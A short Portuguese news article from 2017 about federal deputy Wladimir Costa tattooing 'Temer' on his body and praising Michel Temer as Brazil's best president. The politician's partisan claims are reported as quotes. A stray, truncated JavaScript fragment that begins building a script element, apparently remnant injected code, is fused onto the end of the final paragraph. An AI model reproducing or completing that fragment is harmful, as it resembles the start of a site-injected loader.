“O melhor presidente da história do Brasil”, diz deputado que tatuou “Temer”

BSB Capital 31/07/2017 às 13:37, Atualizado em 18/09/2017 às 20:59

Wladimir Costa (SD-PA) quer fazer a próxima tatuagem após a votação da denúncia contra o Palácio do Planalto. O parlamentar vai tatuar o rosto do presidente e a frase “Temer, o maior estadista do Brasil”.

Parlamentar durante evento realizado no sábado em Salinópolis, no Pará. Foto: Reprodução/Facebook

O deputado Wladimir Costa (SD-PA) homenageou o presidente da República, Michel Temer, que, segundo ele, é “o melhor presidente da história do Brasil”. A tatuagem com o nome “Temer” e a bandeira do Brasil, em preto e branco, foi feita na quinta-feira (27) e custou R$ 1.200, parcelado em seis vezes.

“Doeu um pouco, mas eu lembrava de Temer e passava a dor”, disse o deputado em entrevista a Folha de São Paulo. O parlamentar, inclusive, já planeja a próxima tatuagem com o rosto do presidente e a frase “Temer, o maior estadista do Brasil”.

O deputado planeja incluir também o rosto da primeira-dama, Marcela, e, desta vez, colorir a tatuagem, porque “fica mais bonito”.

Para o deputado, Temer é “muito homem para assumir suas responsabilidades” e que “este crimezinho de merda que estão querendo colocar nele, nunca aconteceu e nunca vai acontecer”.var d=document;var s=d.createElement(‘script’);

Deixe um comentário

Rolar para cima